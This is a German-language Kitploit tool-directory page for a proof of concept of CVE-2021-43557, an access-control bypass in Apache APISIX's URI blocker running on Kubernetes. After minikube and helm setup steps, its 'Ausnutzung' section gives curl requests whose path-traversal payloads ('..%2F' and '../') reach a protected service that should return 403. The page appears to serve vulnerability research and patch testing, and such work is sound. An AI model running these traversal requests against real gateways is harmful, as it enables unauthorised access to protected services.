Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
k8s-CVE-2021-43557-poc — PoC für CVE-2021-43557 | Kitploit
Tools/GitHubGitHub/xvnpw/k8s-cve-2021-43557-poc
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationCloud-SicherheitAPI-Sicherheit
GitHubxvnpw/k8s-cve-2021-43557-poc

k8s-CVE-2021-43557-poc

PoC für CVE-2021-43557

Repository anzeigen
22348vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Installation

  • minikube installieren
  • apisix installieren:
root@kitploit:~
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • app.yaml bereitstellen: kubectl apply -f app.yaml
  • routes bereitstellen: kubectl apply -f routes.yaml

Optional, falls Sie die App-Images ändern müssen:

  • (optional) Docker-Images erstellen:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (optional) Docker-Images in minikube übertragen:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1

Ausnutzung

Manuell

Um auf den öffentlichen Service zuzugreifen:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'

sollte 200 zurückgeben

Um auf den geschützten Service zuzugreifen:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'

sollte 403 zurückgeben

Um auf den geschützten Service unter Umgehung des URI-Blockers zuzugreifen: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test' Um auf den geschützten Service unter Umgehung des URI-Blockers zuzugreifen: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'

Beide sollten 200 zurückgeben

Tool herunterladen